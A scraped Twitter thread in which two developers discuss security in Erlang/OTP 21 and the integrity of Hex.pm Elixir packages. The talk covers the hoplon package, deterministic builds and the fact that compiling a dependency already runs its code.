Erlang/OTP 21 is not just about performance; some thoughts on the security contents: https://blog.voltone.net/post/18 #myelixirstatus
-
-
-
Replying to @Tangui
Thanks! The blog is literally a 2-hour Phoenix project; the comments section and feed... well, you’re looking at it
1 reply 0 retweets 1 like -
Replying to @voltonez
God enough :) I'm totally new to Elixir, and also have an IT sec background. Any thoughts on http://hex.pm and package integrity? https://www.reddit.com/r/elixir/comments/8rpzhi/publishing_elixir_packages_to_hexpm/e0y0uo7/?context=3 …
1 reply 0 retweets 0 likes -
Replying to @Tangui
I’ve written and spoken in the past about the perils of 3rd party deps, and the need for due diligence. Specifically on integrity, the ‘hoplon’ package looks interesting, though I haven’t used ithttps://hex.pm/packages/hoplon
1 reply 0 retweets 0 likes -
Replying to @voltonez
Interesting, have to look deeper into it. I was also thinking of deterministic builds: seems like it's kind of possible with erlc (deterministic opt) and therefore to generate the hash of the binary. The idea is to add the expected hash in mix.exs, and check it after download
1 reply 0 retweets 0 likes -
Replying to @Tangui
Hex packages are downloaded as source. Compilation may be modified by the containing app’s config, or different compiler version. So not deterministic
1 reply 0 retweets 0 likes
And besides, compilation requires running code in the dependency, so any damage might already be done
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.